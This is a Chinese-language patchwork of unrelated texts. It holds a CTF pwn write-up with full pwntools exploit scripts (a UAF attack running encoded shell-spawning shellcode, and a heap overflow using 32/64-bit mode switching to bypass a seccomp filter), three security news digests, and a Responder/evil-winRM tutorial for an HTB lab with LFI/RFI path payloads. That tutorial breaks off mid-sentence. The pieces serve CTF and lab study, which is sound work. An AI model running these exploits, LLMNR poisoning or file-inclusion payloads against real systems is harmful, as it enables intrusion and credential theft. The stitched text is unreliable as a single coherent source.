网上已经有成熟的工具了，所以就简单记录一下工具怎么用吧 https://github.com/TaQini/alpha3https://github.com/veritas501/ae64.githttps://github.com/rcx/shellcode_encoder结合题目来看吧，没有开启NX保护，基本这类型题目九成九都是shellcode题 程序一开始会让我们在bss段上输入数据，并且判断输入的字符大小是否小于0x1F，再结合NX保护没开启的操作，很容易可以想到此时输入的就是shellcode，而每个字节的不能小于0x1F，那么使用ASCII码shellcode就可以完全绕过了，因为小于0x1F的都是不可见字符 接着再来看题目存在的漏洞，题目存在很明显的UAF漏洞 在选项5中则是留有触发shellcode的条件，只要dword_602440不为0则直接指向我们输入的shellcode，而dword_602440位于bss段，因此默认就为0 而在add函数中，分配堆块又恰好都在unsortbin的范围内，那么思路很清楚了，就是使用unsortbin修改dword_602440的值，那么就能触发shellcode 剩下就是shellcode如何绕过0x1F这个限制，可以看到syscal是\xf\x5，因此syscal都无法绕过这个限制 这里使用ae64这个工具 首先将需要修改的shellcode以二进制的形式导出，这里直接用pwntools生成的shellcode即可 from ae64 import AE64 from pwn import * context.arch='amd64' # get bytes format shellcode shellcode = asm(shellcraft.sh()) # get alphanumeric shellcode f = open('shellcode','wb+') f.write(shellcode) f.close() 接着使用ae64的库直接修改为ASCII码shellcode from pwn import * from ae64 import AE64 context.arch = 'amd64' obj = AE64() sc = obj.encode(asm(shellcraft.sh()),'rdx') print(sc) 这里rdx即为shellcode执行的时候call的寄存器 然后就可以生成shellcode了 紧接着拿这段生成的shellcode就可以绕过了 exp from pwn import * sh = process("./pwn") context(arch='amd64') def add(size): sh.recvuntil(" choice:") sh.sendline("1") sh.recvuntil(" message?") sh.sendline(str(size)) def delete(index): sh.recvuntil(" choice:") sh.sendline("2") sh.recvuntil("o be deleted?") sh.sendline(str(index)) def edit(index,content): sh.recvuntil(" choice:") sh.sendline("3") sh.recvuntil(" be modified?") sh.sendline(str(index)) sh.recvuntil("t of the message?") sh.sendline(content) def show(index): sh.recvuntil(" choice:") sh.sendline("4") sh.recvuntil(" to be showed?") sh.sendline(str(index)) def exp(): sh.recvuntil(" choice:") sh.sendline("5") payload = "RXWTYH39Yj3TYfi9WmWZj8TYfi9JBWAXjKTYfi9kCWAYjCTYfi93iWAZj3TYfi9520t800T810T850T860T870T8A0t8B0T8D0T8E0T8F0T8G0T8H0T8P0t8T0T8YRAPZ0t8J0T8M0T8N0t8Q0t8U0t8WZjUTYfi9200t800T850T8P0T8QRAPZ0t81ZjhHpzbinzzzsPHAghriTTI4qTTTT1vVj8nHTfVHAf1RjnXZP" sh.send(payload) add(0x81) add(0x81) delete(0) edit(0, p64(0) + p64(0x602440 - 0x10)) add(0x81) exp() sh.interactive() 机器切换-shellcode 有时候会遇到题目需要同时使用32位shellcode与64位shellcode，那么如何进行机器切换则成为解题的关键。 CS寄存器则是用于标记机器位数的关键寄存器 CS=0x33，64位 CS=0x23，32位 那么如何修改CS寄存器的值，则需要通过retfq与retf的指令 refq，从64位切换到32位 push 0x23; #32位的CS寄存器的值 push 0xxx; #需要跳转的地址 retfq; #从32位切换到64位 ref，从32位切换至64位 push 0x33; #64的CS寄存器的值 push 0xxx; #需要跳转的地址 retf; #从64位切换到32位 再以一道题目作为例子，保护如下，还是没有开启NX保护 题目漏洞在于，再add函数中可申请11个堆块，而题目中给堆块地址容纳的个数为10，因此申请的第11个堆块的地址则会到length中，从而导致第1个堆块的大小变成了堆块的地址值，造成了堆溢出。 这里有个需要注意的地方是会首先检测存放堆块的位置是否为0，为0才会给该堆块申请的机会，因此第1个堆块的大小必须设置为0，才能够申请到11个堆块。 题目还是用mallopt修改了fastbin的大小为0x10，因此使得无法释放的堆块无法放置到fastbin中，但是mallopt实际是修改了max_global_fast的大小 但是题目存在堆溢出漏洞，因此使用修改Unsortbin的bk指针，修改global_max_fast的即可，这样就可以让堆块放进fastbin中了。 并且允许在bss段上输入数据，且该地址刚好在存放堆块地址的上方，因此伪造虚假堆块在该位置就可以完成任意地址写了。 紧接着修改free函数的got表地址为堆块地址，就可以跳转到shellcode中执行，可以看到堆块地址也是具有可执行权限的。 查看一下禁用了哪些函数，发现只能用read，write以及fstat函数，但是fstat函数对于这道题来说没有用。那么没有open函数，我们就没办法进行orw的利用了。 可以看到fstat函数的64位的系统调用号为5 但是32位下的系统调用号5为open函数 那么如果能切换到32位下执行系统调用为5的系统调用，即可完成open函数的执行，这里就要用到上述的方法使用ref与refq指令完成机器位数的切换。 这里需要注意两个点 （1）在切换为机器位数之后栈顶的地址会被截断为4个字节，因此需要重新调整一下栈顶的地址 （2）在机器位数切换为32位时，在执行系统调用还是会显示原来的函数，但是这个是gdb显示错误，它实际被修改为open函数了 exp from pwn import * #sh = process("./pwn") elf = ELF("pwn") def user(name,desc): sh.recvuntil("choice:") sh.sendline("0") sh.recvuntil(" name?") sh.send(name) sh.recvuntil("desc?") sh.send(desc) def add(size): sh.recvuntil("choice:") sh.sendline("1") sh.recvuntil(" message?") sh.send(str(size)) def delete(index): sh.recvuntil("choice:") sh.sendline("2") sh.recvuntil(" be deleted?") sh.send(str(index)) def edit(index, offset, content): sh.recvuntil("choice:") sh.sendline("3") sh.recvuntil("ssage to be modified?") sh.send(str(index)) sh.recvuntil("message to be modified?") sh.send(str(offset)) sh.recvuntil("ent of the message?") sh.send(content) while(1): try: sh = process("./pwn") add(0) #0 add(0) #1 add(0x60) for i in range(8): add(0x71) delete(1) payload = p64(0)*3 + p64(0x21) + p64(0) + p16(0x37f8 - 0x10) edit(0,0,payload) add(9) delete(2) delete(3) delete(4) delete(5) user('a'*0x10+p64(0)+p64(0x71),'b') target = 0x6020f0 payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x71) + p64(target) edit(0,0,payload) add(0x60)#2 sh.recvuntil("Ptr: ") addr = int("0x"+sh.recv(6),16) log.info("addr:"+hex(addr)) add(0x60)#3 edit(3,0,p64(elf.got['free'])) payload = asm('push 0x23;push '+hex(addr+9)+';retfq', arch='amd64') payload += asm('mov esp, '+hex(target+0x50)+';push 0x6761;push 0x6c662f2e;push esp;pop ebx; xor ecx,ecx; mov eax,5; int 0x80',arch='i386') payload += asm('push 0x33;push '+hex(addr+0x2b)+';retf') payload += asm('mov rdi,rax; mov rsi,0x602080;mov rdx, 0x100;mov rax, 0;syscall;',arch='amd64') payload += asm('mov rdi,1;mov rax ,1;syscall;',arch='amd64') edit(2,0,payload) edit(0,0,p64(addr)) #attach(sh,'b*'+str(addr)) delete(6) sh.interactive() except: continue

1、研究人员披露针对Zimbra用户的大规模钓鱼活动 https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/ 至少从 2023 年 4 月起，一场大规模网络钓鱼活动试图窃取全球 Zimbra Collaboration 电子邮件服务器的凭据。网络钓鱼电子邮件被发送到世界各地的组织，而不是特定针对某些组织或部门。此次行动背后的威胁者目前仍未知。攻击始于一封假装来自组织管理员的网络钓鱼电子邮件，通知用户即将进行电子邮件服务器更新，否则导致帐户暂时停用。 2、谷歌浏览器新功能会提醒用户删除恶意扩展程序 https://thehackernews.com/2023/08/google-chromes-new-feature-alerts-users.html 谷歌宣布计划在即将推出的 Chrome 网络浏览器版本中添加一项新功能，以便在用户安装的扩展程序已从 Chrome 网上应用店中删除时提醒用户。该功能将与 Chrome 117 一起发布，当开发人员取消发布、因违反 Chrome Web Store 政策而删除或标记为恶意软件时，用户可以收到通知。当用户点击‘审核’时，会跳转到扩展程序，并可以选择删除该扩展程序或隐藏警告。 3、WinRAR存在远程代码执行漏洞 https://www.zerodayinitiative.com/advisories/ZDI-23-1152/ WinRAR 是数百万人使用的流行 Windows 文件存档实用程序，只需打开存档即可在计算机上执行命令，该漏洞已修复。该漏洞被追踪为 CVE-2023-40477，在打开特制的 RAR 文件后，远程攻击者可以在目标系统上执行任意代码。由于目标需要诱骗受害者打开存档，因此根据 CVSS，该漏洞的严重性评级降至 7.8。 4、Anonymous组织针对日本核网站发起网络攻击 https://securityaffairs.com/149660/hacking/opfukushima-anonymous.html 黑客组织 Anonymous 对日本与核电相关的组织发起了网络攻击，作为 #OpFukushima 行动的一部分。该活动是为了抗议政府将福岛核电站处理后的放射性水排入大海的计划而发起的。自上个月以来，国际原子能机构在其最终报告中披露该平台后不久，攻击活动就增加了。根据该机构的报告，排放将符合全球安全标准。Anonymous 组织已将目标锁定为日本原子能机构、日本原子能公司和日本原子能协会。目前，Anonymous 组织仅针对目标组织的站点发起分布式拒绝服 5、Junos OS存在多个漏洞可导致远程攻击 https://www.juniper.net/documentation/us/en/software/jweb-ex/jweb-ex-application-package/topics/concept/ex-series-j-web-interface-overview-App.html 网络设备公司 Juniper Networks 发布了一个“周期外”安全更新，以解决 Junos OS 的 J-Web 组件中的多个缺陷，这些缺陷可以组合起来在易受影响的安装上实现远程代码执行。这四个漏洞的累积 CVSS 评级为 9.8。它们影响 SRX 和 EX 系列上所有版本的 Junos OS。 6、攻击者利用压缩算法抵抗安卓APK反编译 https://www.joesandbox.com/analysis/895672/0/html 攻击者分发压缩算法的恶意安卓 APK（打包的应用程序安装程序），这些 APK 使用不受支持、未知或经过大量调整的压缩算法来抵抗反编译。这种方法的主要优点是使用静态分析来逃避安全工具的检测，并妨碍研究人员的分析，从而延迟了对安卓恶意软件菌株如何工作的深入了解。研究人员称有 3300 个 APK 正在使用这些不寻常的反分析方法，这可能会导致其中许多程序崩溃。 7、Jenkins 修补了多个插件中的高危漏洞 https://www.securityweek.com/jenkins-patches-high-severity-vulnerabilities-in-multiple-plugins/ 开源软件开发自动化服务器 Jenkins 本周宣布了针对影响多个插件的高危和中危漏洞的补丁。这些补丁解决了文件夹、Flaky Test Handler 和 Shortcut Job 插件中的三个高严重性跨站点请求伪造 (CSRF) 和跨站点脚本 (XSS) 问题。这些漏洞可能导致信息泄露、凭证泄露、CSRF 攻击、HTML 注入和凭证 ID 枚举。 8、Rust开发者抵制Serde项目发布预编译的二进制文件 https://github.com/serde-rs/serde/issues/2538#issuecomment-1654783988 Serde 是 Rust 数据结构的常用序列化和反序列化框架，它决定将其serde_derive宏作为预编译的二进制文件提供。此行为在开发人员中引起了相当大的抵制，开发者担心如果发布这些二进制文件会导致维护者帐户受到损害。根据 Rust 包注册中心 crates.io 的数据，Serde项目总共已被下载超过 1.96 亿次，而serde_derive 宏的下载量超过 1.71 亿次。 9、"LabRat"恶意挖矿活动滥用 TryCloudflare 来隐藏其 C&C https://www.securityweek.com/stealthy-labrat-campaign-abuses-trycloudflare-to-hide-infrastructure/ “LabRat”加密货币挖矿和代理劫持操作依赖于基于签名的工具和隐秘的跨平台恶意软件，并滥用 TryCloudflare 来隐藏其 C&C。 10、多家公司对英特尔 CPU 漏洞"Downfall"做出回应 https://www.securityweek.com/companies-respond-to-downfall-intel-cpu-vulnerability/ 多家大公司针对最近披露的名为 Downfall 的 Intel CPU 漏洞发布了安全公告。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、美国能源公司遭遇大规模二维码网络钓鱼攻击 https://www.bleepingcomputer.com/news/security/major-us-energy-org-targeted-in-qr-code-phishing-attack/ 据观察，网络钓鱼活动主要针对美国一家著名能源公司，利用二维码将恶意电子邮件放入收件箱并绕过安全措施。此次攻击活动引发的 1000 封电子邮件中，大约有三分之一 (29%) 针对一家大型美国能源公司，而其余尝试则针对制造业 (15%)、保险业 (9%)、技术 (7%)、和金融服务（6%）。据发现该活动的研究人员称，这是首次如此大规模地使用二维码，表明更多的网络钓鱼攻击者可能正在测试其作为攻 2、网络代理提供商利用恶意软件传播感染住宅网络牟利 https://cybersecurity.att.com/blogs/labs-research/proxynation-the-dark-nexus-between-proxy-apps-and-malware 研究人员发现了一项大规模活动，该活动向至少40万个 Windows 系统提供了代理服务器应用程序。这些设备在未经用户同意的情况下充当住宅出口节点，并且一家公司正在对通过这些机器运行的代理流量进行收费。住宅代理对于网络犯罪分子来说很有价值，因为它们可以帮助部署来自新 IP 地址的大规模撞库攻击。它们还有合法目的，例如广告验证、数据抓取、网站测试或增强隐私的重新路由。一些代理公司出售 3、Citrix ShareFile存在严重漏洞可被广泛利用 https://www.cisa.gov/news-events/alerts/2023/08/16/cisa-adds-one-known-exploited-vulnerability-catalog CISA 警告称，一个被追踪为 CVE-2023-24489 的关键 Citrix ShareFile 安全文件传输漏洞正成为未知攻击者的攻击目标，并已将该漏洞添加到其已知的已知安全漏洞目录中。Citrix ShareFile（也称为 Citrix Content Collaboration）是一种托管文件传输 SaaS 云存储解决方案，允许客户和员工安全地上传和下载文件。该服务还提供“存 4、PowerShell Gallery存在漏洞可被利用导致供应链攻击 https://blog.aquasec.com/powerhell-active-flaws-in-powershell-gallery-expose-users-to-attacks PowerShell Gallery 中的漏洞可能会被攻击者利用，对注册表用户发起供应链攻击。PowerShell Gallery由 Microsoft 维护，是一个用于共享和获取 PowerShell 代码的中央存储库，其中包括 PowerShell 模块、脚本和所需状态配置 (DSC) 资源。该注册表拥有 11829 个独特的软件包，总共 244615 个软件包。研究人员发现的问题与该服务围绕包名称的宽 5、文件匿名共享网站Anonfile因大量被滥用行为而关闭 https://www.bleepingcomputer.com/news/security/file-sharing-site-anonfiles-shuts-down-due-to-overwhelming-abuse/ Anonfiles 是一项流行的匿名共享文件服务，因无法再应对用户的大量滥用后已关闭。Anonfiles 是一个匿名文件共享网站，允许人们匿名共享文件，而无需记录其活动。然而，它很快成为攻击者最流行的文件共享服务之一，用于共享被盗数据、 被盗凭证和受版权保护的材料的样本。 6、研究人员演示了一种iOS 16假飞行模式的持久性技术 https://securityaffairs.com/149597/mobile-2/airplane-mode-apple-ios-16-exploit.html Jamf 威胁实验室的研究人员在 iOS 16 上开发了一种利用后持久性技术，欺骗受害者相信该设备处于功能正常的飞行模式。事实上，研究人员植入了一种人工飞行模式，可以修改用户界面以显示飞行模式图标，并切断除恶意攻击者的应用程序之外的所有应用程序的互联网连接。使用此技巧，即使用户认为手机处于离线状态，攻击者也可以保持对手机的访问。研究人员指出，该技术尚未用于野外攻击。 7、谷歌将人工智能引入Fuzz测试，结果令人大开眼界 https://www.securityweek.com/google-brings-ai-magic-to-fuzz-testing-with-eye-opening-results/ 谷歌在其 OSS-FUZZ 项目（一项免费服务，为开源项目运行模糊器并私下向开发人员发出检测到的错误的警报）中添加了生成式人工智能技术，并发现当使用 LLM 创建新的模糊目标时，代码覆盖率得到了巨大的改善。 8、LABRAT 行动针对 GitLab 开展恶意挖矿和代理劫持活动 https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/ https://sysdig.com/threat-research/( TRT) 最近发现了一种新的、出于经济动机的操作，称为 LABRAT。该攻击者的一个明显目标是通过代理劫持和加密货币挖矿来赚取收入。 9、微软云安全问题引发美国国土安全部安全审查 https://www.darkreading.com/cloud/microsoft-cloud-woes-inspire-dhs-security-review 美国国土安全部 (DHS) 近期启动了针对云计算环境的网络攻击威胁的调查，微软在处理针对其 Azure 云基础设施的重大攻击方面将面临严格审查。 10、3 个主要电子邮件安全标准被证明漏洞百出 https://www.darkreading.com/vulnerabilities-threats/3-major-email-security-standards-falling-down-on-the-job 安全公司 Cloudflare 发现，绝大多数欺诈性邮件至少通过了三个主要电子邮件安全标准(SPF、DKIM、DMARC)之一的审查。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、黑客针对LinkedIn账户发起网络攻击 https://cyberint.com/blog/research/linkedin-accounts-under-attack-how-to-protect-yourself/ 许多 LinkedIn 用户的帐户被接管或锁定，并且无法通过 LinkedIn 支持找回账户。有些用户甚至被迫支付赎金才能重新获得控制权，或者面临账户被永久删除的情况。攻击者似乎正在使用泄露的凭据或暴力破解来尝试控制大量 LinkedIn 帐户。对于受到强密码或双因素身份验证适当保护的帐户，多次接管尝试导致平台实施临时帐户锁定作为保护措施。然后，系统会提示这些帐户的所有者通过提供附加信息来验证所有权，并允许再次登 2、近两千台Citrix NetScaler服务器被植入后门 https://blog.fox-it.com/2023/08/15/approximately-2000-citrix-netscalers-backdoored-in-mass-exploitation-campaign/ 攻击者利用被跟踪为 CVE-2023-3519 的关键严重性远程代码执行漏洞，在一场大规模黑客活动中入侵了近 2000 台 Citrix NetScaler 服务器。研究人员表示，截至 8 月 14 日，在已发现的受感染服务器中，仍有 1828 台服务器存在后门，其中 1247 台服务器在黑客植入 Webshell 后已得到修补。 3、KmsdBot恶意软件针对物联网设备发起攻击 https://www.akamai.com/blog/security-research/updated-kmsdbot-binary-targeting-iot 研究人员跟踪KmsdBot恶意软件时，发现了针对物联网 (IoT) 设备的更新的 Kmsdx 二进制文件。该二进制文件现在包括对 telnet 扫描的支持以及对更多 CPU 架构的支持，从而扩展了其攻击能力和攻击面。这些更新的功能自 2023 年 7 月中旬以来才出现。该恶意软件针对私人游戏服务器、云托管提供商以及某些政府和教育网站。该恶意软件的活动表明，易受攻击的物联网设备仍然是互联网上的重大威胁，因此更加需要定期采取安全措施 4、Ivanti Avalanche存在堆栈缓冲区溢出漏洞 https://www.bleepingcomputer.com/news/security/ivanti-avalanche-impacted-by-critical-pre-auth-stack-buffer-overflows/ 两个基于堆栈的缓冲区溢出（统称为 CVE-2023-32560）影响了 Ivanti Avalanche，这是一种企业移动管理 (EMM) 解决方案，旨在管理、监控和保护各种移动设备。这些漏洞被评为严重漏洞（CVSS v3：9.8），无需用户身份验证即可远程利用，可能允许攻击者在目标系统上执行任意代码。该漏洞影响 WLAvalancheService.exe 5、谷歌发布可抵御量子攻击的安全密钥实施 https://www.securityweek.com/google-releases-security-key-implementation-resilient-to-quantum-attacks/ 谷歌周二发布了它所说的第一个 FIDO2 安全密钥实施方案，该实施方案应该能够抵抗量子攻击。 6、谷歌发布Chrome 116，修复了26个漏洞 https://www.securityweek.com/chrome-116-patches-26-vulnerabilities/ 谷歌周二宣布向稳定渠道发布 Chrome 116，其中包含 26 个漏洞的补丁，其中包括外部研究人员报告的 21 个漏洞。在外部报告的错误中，有八个错误的严重程度为“高”，其中大多数是内存安全问题。 7、普华永道因MOVEit漏洞泄露银行8万名储户的信息 https://www.freebuf.com/news/375127.html 8月14日，波多黎各自治区最大的银行——人民银行向缅因州司法部长提交了一份客户信息泄露报告。该报告指出，由于供应商普华永道使用的MOVEit软件存在安全漏洞，导致银行82217名储户的个人信息被泄露。 8、全球最大金矿和钼矿厂遭网络攻击：生产受到部分影响 https://www.secrss.com/articles/57787 全球最大金矿、最大钼生产商、主要铜生产商自由港公司遭受网络攻击，部分系统被迫关闭，对生产造成了一定影响。 9、Discord.io 在黑客窃取76W用户数据后确认数据泄露 https://www.bleepingcomputer.com/news/security/discordio-confirms-breach-after-hacker-steals-data-of-760k-users/ Discord.io 自定义邀请服务在遭受数据泄露后暂时关闭，暴露了 760，000 名成员的信息。 10、信息窃取恶意软件Raccoon Stealer以全新隐身版本正式“回归” https://www.freebuf.com/news/375011.html 近日，Raccoon Stealer 信息窃取恶意软件的开发者结束其在黑客论坛长达 6 个月的停滞期，向网络犯罪分子推广该恶意软件的 2.3.0 全新版本。Raccoon 是最知名、使用最广泛的信息窃取恶意软件之一，自 2019 年以来一直通过订阅模式以 200 美元/月的价格出售给威胁行为者。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

0x01.evil-winRM 0x01.1概述 在使用和介绍Responder之前，先来了解一下evil-winRM: evil-winrm是Windows远程管理(WinRM) Shell的终极版本。 Windows远程管理是WS 管理协议的 Microsoft 实施，该协议是基于标准 SOAP、不受防火墙影响的协议，允许不同供应商的硬件和操作系统相互操作。而微软将其包含在他们的系统中，是为了便于系统管理员在日常工作中，远程管理服务器，或通过脚本同时管理多台服务器，以提高他们的工作效率。 此程序可在启用此功能的任何Microsoft Windows服务器上使用（通常端口为5985），当然只有在你具有使用凭据和权限时才能使用。因此，我们说它可用于黑客攻击的后利用/渗透测试阶段。相对于攻击者来说，这个程序能为他们提供更好更简单易用的功能。当然，系统管理员也可以将其用于合法目的，但其大部分功能都集中于黑客攻击/渗透测试。 0x01.2安装和使用 安装： 方法一 sudo apt install evil-winrm 方法二： git clone https://github.com/Hackplayers/evil-winrm.git 方法三： gem install evil-winrm 使用： 首先查看帮助文档 root@kali:~# evil-winrm -h Evil-WinRM shell v3.5 用法：evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r 领域] [--spn SPN_PREFIX] [-l]     -S, --ssl 启用 ssl     -c, --pub-key PUBLIC_KEY_PATH 公钥证书的本地路径     -k, --priv-key PRIVATE_KEY_PATH 私钥证书的本地路径     -r, --realm DOMAIN Kerberos auth，还必须使用此格式在 /etc/krb5.conf 文件中设置 -> CONTOSO.COM = { kdc = fooserver.contoso.com }     -s, --scripts PS_SCRIPTS_PATH Powershell 脚本本地路径         --spn SPN_PREFIX Kerberos 身份验证的 SPN 前缀（默认 HTTP）     -e, --executables EXES_PATH C# 可执行文件本地路径     -i, --ip IP 远程主机IP或主机名。 Kerberos 身份验证的 FQDN（必需）     -U, --url URL 远程 url 端点（默认 /wsman）     -u, --user USER 用户名（如果不使用 kerberos，则需要）     -p, --password PASS 密码     -H, --hash HASH NTHash     -P, --port PORT 远程主机端口（默认5985）     -V, --version 显示版本     -n, --no-colors 禁用颜色     -N, --no-rpath-completion 禁用远程路径完成     -l, --log 记录 WinRM 会话     -h, --help 显示此帮助消息 0x02.Responder 0x02.1 概念 响应 LLMNR、NBT-NS 和 MDNS 投毒者。 它将根据名称后缀回答特定的 NBT-NS（NetBIOS 名称服务）查询（请参阅：http://support.microsoft.com/kb/163409）。默认情况下，该工具将仅响应适用于 SMB 的文件服务器服务请求。 0x02.2 特性 内置 SMB 身份验证服务器 默认情况下支持具有扩展安全性 NTLMSSP 的 NTLMv1、NTLMv2 哈希。 已成功测试从 Windows 95 到 Server 2012 RC、Samba 和 Mac OSX Lion。 NT4 支持明文密码，当设置--lm选项时，LM 哈希降级。该工具启动时默认启用此功能。 内置 MSSQL 身份验证服务器 为了将 SQL 身份验证重定向到此工具，您需要为 Windows Vista 之前的系统设置选项 -r（用于 SQL Server 查找的 NBT-NS 查询使用工作站服务名称后缀）（LLMNR 将用于 Vista 和 更高）。 该服务器支持 NTLMv1、LMv2 哈希。 此功能已在 Windows SQL Server 2005 和 2008 上成功测试。 内置 HTTP 身份验证服务器 为了将 HTTP 身份验证重定向到此工具，您需要为早于 Vista 的 Windows 版本设置选项 -r（用于 HTTP 服务器查找的 NBT-NS 查询使用工作站服务名称后缀发送）。 对于 Vista 及更高版本，将使用 LLMNR。 该服务器支持 NTLMv1、NTLMv2 哈希和基本身份验证。 该服务器已在 IE 6 至 IE 10、Firefox、Chrome、Safari 上成功测试。 注意：此模块也适用于从 Windows WebDav 客户端 (WebClient) 发出的 WebDav NTLM 身份验证。 您现在可以将自定义文件发送给受害者。 内置 HTTPS 身份验证服务器 与上面相同。 文件夹 certs/ 包含 2 个默认密钥，其中包括一个虚拟私钥。 这是故意的，目的是让 Responder 开箱即用。 添加了一个脚本，以防您需要生成自己的自签名密钥对。 内置 LDAP 身份验证服务器 为了将 LDAP 身份验证重定向到此工具，您需要为早于 Vista 的 Windows 版本设置选项 -r（用于 HTTP 服务器查找的 NBT-NS 查询使用工作站服务名称后缀发送）。 对于 Vista 及更高版本，将使用 LLMNR。 该服务器支持 NTLMSSP 哈希和简单身份验证（明文身份验证）。 该服务器已在 Windows 支持工具"ldp"和 LdapAdmin 上成功测试。 内置 FTP、POP3、IMAP、SMTP 身份验证服务器 该模块将收集明文凭据 内置 DNS 服务器 该服务器将回答 A 类查询。 当它与 ARP 欺骗结合起来时，这真的很方便。 内置 WPAD 代理服务器 如果启用了“自动检测设置”，此模块将捕获网络上启动 Internet Explorer 的任何人的所有 HTTP 请求。 该模块非常有效。 您可以在 Responder.conf 中配置自定义 PAC 脚本，并将 HTML 注入服务器的响应中。 请参阅 Responder.conf。 浏览器监听器 该模块允许在隐身模式下找到 PDC。 指纹识别 当使用选项 -f时，响应程序将对发出 LLMNR/NBT-NS 查询的每个主机进行指纹识别。 所有采集模块在指纹模式下仍然可以工作。 ICMP 重定向 python tools/Icmp-Redirect.py 适用于 Windows XP/2003 及更早版本上的 MITM 域成员。 这种攻击与 DNS 模块相结合非常有效。 流氓 DHCP python tools/DHCP.py DHCP 通知欺骗。 允许您让真正的 DHCP 服务器发布 IP 地址，然后发送 DHCP Inform 应答以将您的 IP 地址设置为主 DNS 服务器，以及您自己的 WPAD URL。 分析模式 该模块允许您查看网络上的 NBT-NS、BROWSER、LLMNR、DNS 请求，而不会破坏任何响应。 此外，您还可以被动映射域、MSSQL 服务器、工作站，看看 ICMP 重定向攻击在您的子网上是否可行。 0x02.3 Responder欺骗原理 在使用Responder之前，我们要先了解windwos默认开启的三种协议，这三种协议分别是链路本地多播名称解析（LLMNR）、名称服务器(NBNS) 协议和多播DNS（mdns）协议。 LLMNR 链路本地多播名称解析（LLMNR）是一个基于域名系统（DNS）数据包格式的协议，IPv4和IPv6的主机可以通过此协议对同一本地链路上的主机执行名称解析。Windows 操作系统从 Windows Vista开始就内嵌支持，Linux系统也通过systemd实现了此协议。它通过UDP 5355端口进行通信，且LLMNR支持IPV6。 NBNS 网络基本输入/输出系统(NetBIOS) 名称服务器(NBNS) 协议是 TCP/IP 上的 NetBIOS (NetBT) 协议族的一部分，它在基于 NetBIOS 名称访问的网络上提供主机名和地址映射方法。通过UDP 137端口进行通信，但NBNS不支持IPV6。 mDNS 在计算机网络中 ，多播DNS（ mDNS ）协议将主机名解析为不包含本地名称服务器的小型网络中的IP地址。 它是一种零配置服务，使用与单播域名系统（DNS）基本相同的编程接口，数据包格式和操作语义。 虽然Stuart Cheshire将mDNS设计为独立协议，但它可以与标准DNS服务器协同工作。它通过UDP 5353端口进行通信，且mDNS也支持IPV6。 目前仅有windows 10以上的系统支持mdns，经测试发现，禁用了llmnr后mdns也会被禁用。 总的来说，以上几种协议在windows中都是默认启用的，主要作用都是在DNS服务器解析失败后，尝试对windows主机名称进行解析，正因为默认启用、且实现方式又类似于ARP协议，并没有一个认证的过程，所以就会引发各种基于这两种协议的欺骗行为，而Responder正是通过这种方式，欺骗受害机器，并使受害机器在后续认证中发送其凭证。 0x02.4 使用方法 root@kali:~#responder -h 用法：responder -I eth0 -w -d 或者： responder -I eth0 -wd 选项：   --version 显示程序的版本号并退出   -h, --help 显示此帮助消息并退出   -A, --analyze 分析模式。 此选项允许您查看NBT-NS，                         BROWSER、LLMNR 请求没有响应。   -I eth0，--接口=eth0                         要使用的网络接口，可以使用“ALL”作为                         所有接口的通配符   -i 10.0.0.21,--ip=10.0.0.21                         要使用的本地 IP（仅适用于 OSX）   -6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed                         使用其他 IPv6 地址对所有请求进行毒害                         响应者之一。   -e 10.0.0.22, --externalip=10.0.0.22                         使用其他 IP 地址毒害所有请求                         响应者之一。   -b, --basic 返回基本 HTTP 身份验证。 默认值：NTLM   -d, --DHCP 启用 DHCP 广播请求的应答。 这                         选项将在 DHCP 响应中注入 WPAD 服务器。                         默认值：假   -D, --DHCP-DNS 该选项将在 DHCP 中注入 DNS 服务器                         响应，否则将添加 WPAD 服务器。                         默认值：假   -w, --wpad 启动 WPAD 恶意代理服务器。 默认值为                         错误的   -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY                         恶意 WPAD 代理使用的上游 HTTP 代理                         传出请求（格式：主机:端口）   -F, --ForceWpadAuth 对 wpad.dat 文件强制进行 NTLM/Basic 身份验证                         恢复。 这可能会导致登录提示。 默认：                         错误的   -P, --ProxyAuth 强制 NTLM（透明）/基本（提示）                         代理的身份验证。 WPAD 不需要                         在。 这个选项非常有效。 默认值：假   --lm 强制 Windows XP/2003 和 LM 哈希降级                         早些时候。 默认值：假   --disable-ess 强制 ESS 降级。 默认值：假   -v, --verbose 增加详细程度。 0x03 靶场实战--Responder与evil-winRM配合远程登录windows 测试环境： kali （攻击机）   192.168.154.128 vpn接入内网环境: ip -> 10.10.14.115 HTB靶机 windows 10 （受害机） 10.129.48.161 开启靶机 前置的步骤简单过一下： TASK 1 When visiting the web service using the IP address, what is the domain that we are being redirected to? unika.htb 直接curl探测一下就行 访问域名需要在本地的hosts文件就行一个配置： TASK 2 Which scripting language is being used on the server to generate webpages? PHP 直接使用wappalyzer插件即可 TASK 3 What is the name of the URL parameter which is used to load different language versions of the webpage? page 查看网页源代码： TASK 4 Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe" ../../../../../../../../windows/system32/drivers/etc/hosts 这里熟悉文件包含漏洞(FI)师傅能直接get到点： TASK 5 Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe" //10.10.14.6/somefile 这里和上一问同理 TASK 6 What does 